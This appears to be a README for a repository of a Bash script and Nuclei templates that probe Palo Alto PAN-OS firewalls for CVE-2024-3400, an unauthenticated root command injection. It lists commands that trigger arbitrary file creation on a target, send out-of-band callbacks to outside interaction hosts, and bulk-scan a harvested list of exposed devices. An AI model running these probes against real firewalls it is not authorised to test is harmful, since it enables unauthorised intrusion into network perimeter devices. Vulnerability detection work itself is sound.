A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
This repository contains a Nuclei Template designed to detect vulnerabilities related to Palo Alto PAN-OS bugs, specifically targeting CVE-2024-3400.
Comprehensive research on this vulnerability has been published at:
[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
- 0 Byte File Creation: The vulnerability allows the creation of a 0-byte file; the Bash script tests for this with a curl request.
- OS Command Injection: The Nuclei Template detects potential OS command injection vulnerabilities.
Execute the following command to run the Bash script:
./CVE-2024-3400.sh http://target
or
sh CVE-2024-3400.sh http://target
The script will check if a file is created (returning a 200 OK status). If successful, it will then verify if the file exists (returning a 403 Forbidden status).
- Start an Interact Server:
interactsh-client -v
- Run the Nuclei Template:
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug
- Boom Boom Template! (Get a subdomain from https://dig.pm)
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.org
A list of potential targets can be found here.
python fofax3r.py
- Author: 자전거, 自転車, 自行车